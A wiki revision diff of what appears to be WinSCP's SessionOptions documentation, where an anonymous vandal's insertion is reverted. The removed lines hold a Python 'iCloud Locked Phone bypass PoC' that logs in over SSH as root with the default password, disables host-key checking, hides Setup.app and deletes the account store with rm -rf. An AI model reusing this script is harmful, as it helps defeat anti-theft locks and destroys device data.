Differences

This shows you the differences between the selected revisions of the page.

2021-09-01 2021-09-01
hi (75.155.85.24) (hidden) (untrusted) Restored revision 1630049237. Undoing revision 1630510358. (martin) (hidden)
Line 21: Line 21:
| SessionOptions() | Default constructor. | | SessionOptions() | Default constructor. |
-""" +===== [[properties]] Properties ===== 
-iCloud Locked Phone bypass PoC +^ Name ^ Description ^ 
-you need to get the SSH server on your iDevice running first +| FtpMode ==FtpMode== | [[ftp_modes|FTP mode]]. Possible values are ''FtpMode.Passive'' (default) and ''FtpMode.Active''. | 
-""&quot+| FtpSecure ==FtpSecure== | [[ftps#methods|FTPS mode]]. Possible values are ''FtpSecure.None'' (default), ''FtpSecure.Implicit'' and ''FtpSecure.Explicit''. | 
-import subprocess +| <del>bool ==GiveUpSecurityAndAcceptAnySshHostKey==&lt;/del&gt; | Give up security and accept any [[ssh_verifying_the_host_key|SSH host key]]. To be used in exceptional situations only, when security is not required. When set, log files will include warning about insecure connection. To maintain security, use [[#sshhostkeyfingerprint|''SshHostKeyFingerprint'']]. //Obsoleted, use [[#sshhostkeypolicy|''SshHostKeyPolicy.GiveUpSecurityAndAcceptAny&#039;']] instead.// &recent | 
-import paramiko +| bool ==GiveUpSecurityAndAcceptAnyTlsHostCertificate== | Give up security and accept any FTPS/WebDAVS server [[tls#certificate|TLS/SSL certificate]]. To be used in exceptional situations only, when security is not required. When set, log files will include warning about insecure connection. To maintain security, use [[#tlshostcertificatefingerprint|&#039;&#039;TlsHostCertificateFingerprint&#039;&#039;]]. | 
- +| string ==HostName== | Name or IP of the host to connect to. Mandatory property. In a form of &#039;'example.com'' or &#039;'192.0.2.0''. | 
-RPORT = 44 +| string ==Name== | Returns a generated name of a session, based on available information -- typically &#039;'UserName@HostName''. Read-only. | 
-LPORT = 2222 +| string ==NewPassword== | When set, tries to [[task_change_password|change password]] to the new one. | 
-password = &quot;alpine&quot; +| string ==Password== | Password for authentication. | 
- +| int ==PortNumber== | Port number to connect to. Keep default &#039;&#039;0&#039;' to use the default port for the protocol. | 
-iproxy = subprocess.Popen([&quot;iproxy&quot;, str(LPORT), str(RPORT)], stdout=subprocess.DEVNULL, stderr=subprocess.STDOUT) +| string ==PrivateKeyPassphrase== | Passphrase for encrypted private keys and client certificates. | 
-ssh = paramiko.SSHClient() +| Protocol ==Protocol== | Protocol to use for the session. Possible values are ''Protocol.Sftp'' (default), &#039;'Protocol.Scp'', '&#039;Protocol.Ftp'&#039;, ''Protocol.Webdav'' and &#039;&#039;Protocol.%%S3%%''. | 
-ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) +| string ==RootPath== | WebDAV root path or S3 bucket path. Set, when the HTTP server root or S3 bucket list is not accessible. | 
-print(&quot;Initiating SSH connection&quot;) +| [[dotnet&gt;system.security.securestring|SecureString]] ==SecureNewPassword== | When set, tries to [[task_change_password|change password]] to the new one. Use instead of [[#newpassword|&#039;&#039;NewPassword&#039;']] to reduce a number of unencrypted copies of the password in memory. | 
-while True: +| [[dotnet&gt;system.security.securestring|SecureString]] ==SecurePassword== | Encrypted password for authentication. Use instead of [[#password|'&#039;Password&#039;']] to reduce a number of unencrypted copies of the password in memory. | 
- ···try: +| [[dotnet>system.security.securestring|SecurePrivateKeyPassphrase]] ==SecurePrivateKeyPassphrase== | Encrypted passphrase for encrypted private keys and client certificates. Use instead of [[#privatekeypassphrase|'&#039;PrivateKeyPassphrase&#039;']] to reduce a number of unencrypted copies of the passphrase in memory. | 
- ·······ssh.connect('localhost', username='root', password=password, port=LPORT) +| string ==SshHostKeyFingerprint== | Fingerprint of SSH server [[ssh_verifying_the_host_key|host key]] (or several alternative fingerprints separated by semicolon). It makes WinSCP automatically [[scripting#hostkey|accept host key]] with the fingerprint. Use SHA-256 fingerprint of the host key. Mandatory for SFTP/SCP protocol.((You can leave the property &#039;'null'', if you set [[#giveupsecurityandacceptanysshhostKey|''GiveUpSecurityAndAcceptAnySshHostKey'']].)) //Learn how to [[faq_hostkey|obtain host key fingerprint]]//.··
- ·······break +| SshHostKeyPolicy ==SshHostKeyPolicy== | SSH host key policy. Use the default &#039;&#039;SshHostKeyPolicy.Check'&#039; to [[ssh_verifying_the_host_key|verify the host key]] against [[#sshhostkeyfingerprint|&#039;&#039;SshHostKeyFingerprint'&#039;]]. Use &#039;&#039;SshHostKeyPolicy.GiveUpSecurityAndAcceptAny'&#039; to give up a security and accept any SSH host key. To be used in exceptional situations only, when security is not required. When set, log files will include warning about insecure connection. Use &#039;&#039;SshHostKeyPolicy.AcceptNew'&#039; to automatically accept host key of new hosts. The known keys are cached in registry. | 
- ···except: +| string ==SshPrivateKeyPath== | Full path to SSH [[public_key#private|private key file]]. | 
- ·······print(&quot;Failed, retrying&quot;) +| string ==TlsClientCertificatePath== | Full path to [[tls#client_certificate|TLS/SSL client certificate]]. | 
- ·······continue +| string ==TlsHostCertificateFingerprint== | Fingerprint of FTPS/WebDAVS server [[tls#certificate|TLS/SSL certificate]] to be automatically accepted (useful for certificates signed by an untrusted authority). Use SHA-256 fingerprint of the certificate. | 
-print(&quot;Connection established&quot;) +| TimeSpan ==Timeout== | Server response timeout. Defaults to 15 seconds. | 
-print(&quot;Mounting filesystem as read/write&quot;) +| int ==TimeoutInMilliseconds== | Alternative to [[#timeout|&#039;&#039;Timeout&#039;']]. Particularly useful for COM hosts, that cannot use &#039;&#039;TimeSpan&#039;&#039;, such as Visual Basic. | 
-ssh.exec_command(&quot;mount -o rw,union,update /&quot;) +| string ==UserName== | Username for authentication. Mandatory property. | 
-print(&quot;Cleaning mount_rw file&quot;) +| bool ==WebdavSecure== | Use WebDAVS (WebDAV over TLS/SSL), instead of WebDAV. |
-ssh.exec_command('echo &quot;&quot; > /.mount_rw') +
-print(&quot;Hiding Setup.app&quot;) +
-ssh.exec_command(&quot;mv /Application/Setup.app /Application/Setup.app.backup&quot;) +
-print(&quot;Clearing UI cache&quot;) +
-ssh.exec_command(&quot;uicache --all&quot;) +
-print(&quot;Clearing iCloud user&quot;) +
-ssh.exec_command(&quot;rm -rf /var/mobile/Library/Accounts/*&quot;) +
-print(&quot;Respringing device&quot;) +
-ssh.exec_command(&quot;killall backboardd&quot;+
-print(&quot;Finishing exploit script&quot;) +
-print(&quot;Restarting your device&quot;) +
-ssh.exec_command(&quot;reboot&quot;) +
-iproxy.terminate() +
-iproxy.kill()+
===== Methods ===== ===== Methods =====

Last modified: by martin